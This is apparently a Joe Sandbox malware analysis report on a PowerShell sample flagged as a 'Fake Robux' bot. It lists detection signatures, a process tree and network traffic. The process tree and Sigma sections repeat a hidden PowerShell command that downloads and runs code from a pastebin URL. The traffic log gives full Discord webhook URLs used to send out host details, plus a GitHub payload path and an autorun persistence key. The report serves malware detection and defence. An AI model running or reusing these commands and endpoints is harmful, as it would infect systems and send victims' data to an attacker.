Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cr_asm_menu..ps1

Overview

General Information

Sample name:cr_asm_menu..ps1
Analysis ID:1534237
MD5:8921aea500ed7ed76426c96b304de529
SHA1:3dba5efe9f6037e31eb7b794935633c2d0c35468
SHA256:47490ff15e6c2aa96746eeffeca6997f01be04f1fc484d27b2a59020448aafe4
Tags:Neth3Nps1user-JAMESWT_MHT
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 7844 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 7860 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\r422pnl3\CSC544D18D68EB4FCE8319BF18EEFBBF9E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 2748 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 7180 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7412 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1172 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 1156 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7780 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7632INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x550a6:$b1: ::WriteAllBytes(
  • 0x27539:$s1: -join
  • 0x7aace:$s1: -join
  • 0x87ba3:$s1: -join
  • 0x8af75:$s1: -join
  • 0x8b627:$s1: -join
  • 0x8d118:$s1: -join
  • 0x8f31e:$s1: -join
  • 0x8fb45:$s1: -join
  • 0x903b5:$s1: -join
  • 0x90af0:$s1: -join
  • 0x90b22:$s1: -join
  • 0x90b6a:$s1: -join
  • 0x90b89:$s1: -join
  • 0x913d9:$s1: -join
  • 0x91555:$s1: -join
  • 0x915cd:$s1: -join
  • 0x91660:$s1: -join
  • 0x918c6:$s1: -join
  • 0x93a5c:$s1: -join
  • 0xa24a6:$s1: -join
Process Memory Space: powershell.exe PID: 1172INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x3e845:$b1: ::WriteAllBytes(
  • 0x43314:$b1: ::WriteAllBytes(
  • 0xc9336:$s1: -join
  • 0xc9ad0:$s1: -join
  • 0x1999a1:$s1: -join
  • 0x19a19d:$s1: -join
  • 0x4d078:$s3: reverse
  • 0x4d366:$s3: reverse
  • 0x4da80:$s3: reverse
  • 0x4e239:$s3: reverse
  • 0x50858:$s3: reverse
  • 0x50c72:$s3: reverse
  • 0x517fa:$s3: reverse
  • 0x524a7:$s3: reverse
  • 0x67b5f:$s3: reverse
  • 0x6d5bc:$s3: reverse
  • 0x76e26:$s3: reverse
  • 0x7b834:$s3: reverse
  • 0x8b9b8:$s3: reverse
  • 0x9731c:$s3: reverse
  • 0xe6024:$s3: reverse
Process Memory Space: powershell.exe PID: 1796INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2ddd3:$b1: ::WriteAllBytes(
  • 0xabd99:$s1: -join
  • 0xbc29f:$s1: -join
  • 0xe1ef1:$s1: -join
  • 0xe2651:$s1: -join
  • 0xbf949:$s3: reverse
  • 0xc659e:$s3: reverse
  • 0xc8585:$s3: reverse
  • 0xd35b4:$s3: reverse
  • 0xf0dce:$s3: reverse
  • 0xf10bc:$s3: reverse
  • 0xf17d6:$s3: reverse
  • 0xf1f8f:$s3: reverse
  • 0xf907a:$s3: reverse
  • 0xf9494:$s3: reverse
  • 0xfa01c:$s3: reverse
  • 0xfacc9:$s3: reverse
  • 0x12f58e:$s3: reverse
  • 0x1333c0:$s3: reverse
  • 0x153d14:$s3: reverse
  • 0x15f63a:$s3: reverse

Other

SourceRuleDescriptionAuthorStrings
amsi64_1172.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_1796.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7180, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 7412, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", ProcessId: 7632, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline", ProcessId: 7844, ProcessName: csc.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7632, TargetFilename: C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", ProcessId: 7632, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_menu..ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline", ProcessId: 7844, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:09:43.079989+020028576591A Network Trojan was detected192.168.2.949983162.159.137.232443TCP
2024-10-15T18:09:51.671332+020028576591A Network Trojan was detected192.168.2.949984162.159.137.232443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T18:09:29.481334+020028576581A Network Trojan was detected192.168.2.949926162.159.137.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49918 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49964 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49976 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49983 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49984 version: TLS 1.2
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1785758813.000001AC21045000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbhBG" source: powershell.exe, 0000000B.00000002.1985627382.0000012D9C156000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.1785758813.000001AC21045000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2092832286.000001CA45FB1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd source: powershell.exe, 00000000.00000002.1787154201.000001AC2146B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1787154201.000001AC2146B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2094252514.000001CA4600B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.1787154201.000001AC214CC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb3 source: powershell.exe, 00000000.00000002.1787154201.000001AC2143F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb_. source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXD source: powershell.exe, 00000000.00000002.1785758813.000001AC210D2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.1757321925.000001AC07012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1787154201.000001AC2143F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C0FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1785758813.000001AC210D2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb%* source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbllndows" type="System.Configuration.IgnoreSection, System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" allowLocation="false" /> source: powershell.exe, 0000000B.00000002.1983254762.0000012D9BE7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1757321925.000001AC07092000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C0CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1985627382.0000012D9C176000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C0FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1757321925.000001AC07012000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787154201.000001AC21519000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C0CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C0CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1785758813.000001AC210D2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Wn.pdbW source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb5 source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.2094788479.000001CA46053000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000000.00000002.1757321925.000001AC07012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1985627382.0000012D9C156000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb"V source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.pdb source: powershell.exe, 00000000.00000002.1757798711.000001AC0A65A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.pdbhPp source: powershell.exe, 00000000.00000002.1757798711.000001AC0A65A000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.9:49926 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49984 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49983 -> 162.159.137.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 212Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 297Connection: Keep-Alive
